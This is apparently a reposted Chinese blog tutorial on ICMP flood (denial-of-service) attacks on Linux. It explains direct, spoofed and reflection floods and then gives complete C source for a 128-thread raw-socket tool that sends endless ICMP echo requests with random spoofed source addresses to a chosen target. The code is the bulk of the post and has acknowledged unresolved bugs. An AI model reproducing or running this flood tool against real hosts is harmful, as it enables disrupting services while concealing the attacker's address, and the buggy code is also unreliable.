Linux下ICMP洪水***实例

原文链接：http://blog.chinaunix.net/uid-25324849-id-215075.html

注：所以文章红色字体代表需要特别注意和有问题还未解决的地方，蓝色字体表示需要注意的地方

1.本文所介绍的程序平台

虚拟机为：Red Hat Enterprise Linux 5

2.洪水***简介

洪水***指的是利用计算机网络技术向目标机发送大量的无用数据报文，使得目标主机忙于处理无用的数据报文而无法提供正常的服务的网络行为。

洪水***（FLOOD ATTACK），顾名思义，是用大量的请求来淹没目标机。洪水***主要利用了网络协议的安全机制或者直接用十分简单的拼资源的方法来对目标机造成影响。

***的手段主要是使用畸形的报文来让目标机进行处理或者等待，一般都是在原始套接字层进行程序设计。洪水***主要分为ICMP、UDP和SYN***3种类型。

2.1 ICMP洪水***

本实例的ICMP代码是简单的直接方法，建立多个线程向同一个主机发送ICMP请求，而本地的IP地址是伪装的。由于程序仅发送响应，不接收响应，容易造成目标主机的宕机。

ICMP Flood是一种在ping基础上形成的，但是用ping程序很少能造成目标机的问题。这里边最大的问题是提高处理的速度。ICMP洪水***主要有3种方式。

直接洪水***：这样做需要本地主机的带宽与目标主机的带宽进行比拼，可以采用多线程的方法一次性发送多个ICMP请求报文，让目标主机处理过程问题而速度缓慢或者宕机，直接***容易暴露自己的源IP地址，被对方反攻。

伪装IP***：在直接***的基础上，将发生方的IP地址伪装，将直接IP***的缺点进行了改进。

反射***：与直接***和伪装***不同，反射***不是直接对目标机进行***，而是让其他一群主机误认为目标机在像他们发送ICMP请求包，一群主机向目标机发送ICMP应答包，***方向一群主机发送ICMP请求，将请求的源地址伪装成目标机的IP地址，这样目标机就成了ICMP回显反射的焦点。

注意下面程序有两个问题。

实例：

#include <stdio.h>

#include <ctype.h>

#include <unistd.h>

#include <fcntl.h>

#include <signal.h>

#include <sys/time.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netdb.h>

#include <errno.h>

#include <stdlib.h>

#include <time.h>

#include <pthread.h>

#include <stdio.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

#include <netdb.h>

#include <string.h>

#include <stdlib.h>

#include <syslog.h>

#include <stdio.h>

#include <signal.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <unistd.h>

#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/ip_icmp.h>

#include <netdb.h>

#include <setjmp.h>

#include <errno.h>

#include <sys/time.h>

/* 最多线程数 */

#define MAXCHILD 128

/* 目的IP地址 */

static unsigned long dest = 0;

/* ICMP协议的值 */

static int PROTO_ICMP = -1;

/* 程序活动标志 */

static int alive = -1;

static int rawsock;

/* 随机函数产生函数

*由于系统的函数为伪随机函数

*其与初始化有关，因此每次用不同值进行初始化

*/

static inline ulong

myrandom (int begin, int end)

{

int gap = end - begin +1;

int ret = 0;

/* 用系统时间初始化 */

srand((unsigned)time(0));

/* 产生一个介于begin和end之间的值 */

ret = random()%gap + begin;

return ret;

}

static void DoS_icmp (void );

static void

DoS_icmp (void )

{

struct sockaddr_in to;

struct ip *iph;

struct icmp *icmph;

char *packet;

ulong temp;

int pktsize = sizeof (struct ip) + sizeof (struct icmp) + 64;

packet =(char *)malloc (pktsize);

iph = (struct ip *) packet;

icmph = (struct icmp *) (packet + sizeof (struct ip));

memset (packet, 0, pktsize);

/* IP的版本,IPv4 */

iph->ip_v = 4;

/* IP头部长度,字节数 */

iph->ip_hl = 5;

/* 服务类型 */

iph->ip_tos = 0;

/* IP报文的总长度 */

iph->ip_len = htons (pktsize);

/* 标识,设置为PID */

iph->ip_id = htons (getpid ());

/* 段的便宜地址 */

iph->ip_off = 0;

/* TTL */

iph->ip_ttl = 0x0;

/* 协议类型 */

iph->ip_p = PROTO_ICMP;

/* 校验和,先填写为0 */

iph->ip_sum = 0;

/* 发送的源地址 */

temp = myrandom(0, 65535);

iph->ip_src = *(struct in_addr *)&temp;

/* 发送目标地址 */

iph->ip_dst = *(struct in_addr*)&dest;

//为什么这个输出会有差别，目的地址应该是一致的啊？？

//printf("dst ip: %s\n",inet_ntoa(*(struct in_addr*)&dest));

//printf("src ip : %s , dst ip: %s\n", inet_ntoa(iph->ip_src), inet_ntoa(iph->ip_dst));

/* ICMP类型为回显请求 */

icmph->icmp_type = ICMP_ECHO;

/* 代码为0 */

icmph->icmp_code = 0;

/* 由于数据部分为0,并且代码为0,直接对不为0即icmp_type部分计算 */

icmph->icmp_cksum = htons (~(ICMP_ECHO << 8));

/* 填写发送目的地址部分 */

to.sin_family =AF_INET;

to.sin_addr.s_addr = dest;

to.sin_port = htons(0);

/* 发送数据 */

sendto (rawsock, packet, pktsize, 0, (struct sockaddr *) &to, sizeof (struct sockaddr));

/* 释放内存 */

free (packet);

}

static void *

DoS_fun (void * ip)

{

while(alive)

{

DoS_icmp();

//icmp();为什么有没有定义的函数而不报错啊？g++不报错 gcc报错

}

}

/* 信号处理函数,设置退出变量alive */

static void

DoS_sig(int signo)

{

alive = 0;

}

int main(int argc, char *argv[])

{

struct hostent * host = NULL;

struct protoent *protocol = NULL;

char protoname[]= "icmp";

int i = 0;

pthread_t pthread[MAXCHILD];

int err = -1;

unsigned longtemp;

alive = 1;

/* 截取信号CTRL+C */

signal(SIGINT, DoS_sig);

/* 参数是否数量正确 */

if(argc < 2)

{

printf("usage : \n");

return -1;

}

/* 获取协议类型ICMP */

protocol = getprotobyname(protoname);

if (protocol == NULL)

{

perror("getprotobyname()");

return -1;

}

PROTO_ICMP = protocol->p_proto;

/* 输入的目的地址为字符串IP地址 */

dest = inet_addr(argv[1]);

if(dest == INADDR_NONE)

{

/* 为DNS地址 */

host = gethostbyname(argv[1]);

if(host == NULL)

{

perror("gethostbyname");

return -1;

}

temp = inet_addr(host->h_addr);

/* 将地址拷贝到dest中 */

memcpy((char *)&dest, &temp, host->h_length);

}

printf("dst ip: %s\n", inet_ntoa(*(struct in_addr*)&dest));

sleep(5);

/* 建立原始socket */

rawsock = socket (AF_INET, SOCK_RAW, PROTO_ICMP);

if (rawsock < 0)

rawsock = socket (AF_INET, SOCK_RAW, PROTO_ICMP);

/* 设置IP选项 */

setsockopt (rawsock, SOL_IP, IP_HDRINCL, "1", sizeof ("1"));

/* 建立多个线程协同工作 */

for(i=0; i<MAXCHILD; i++)

{

err = pthread_create(&pthread[i], NULL, DoS_fun, (void *)&i);

}

/* 等待线程结束 */

for(i=0; i<MAXCHILD; i++)

{

pthread_join(pthread[i], NULL);

}

printf("over \n");

close(rawsock);

return 0;

}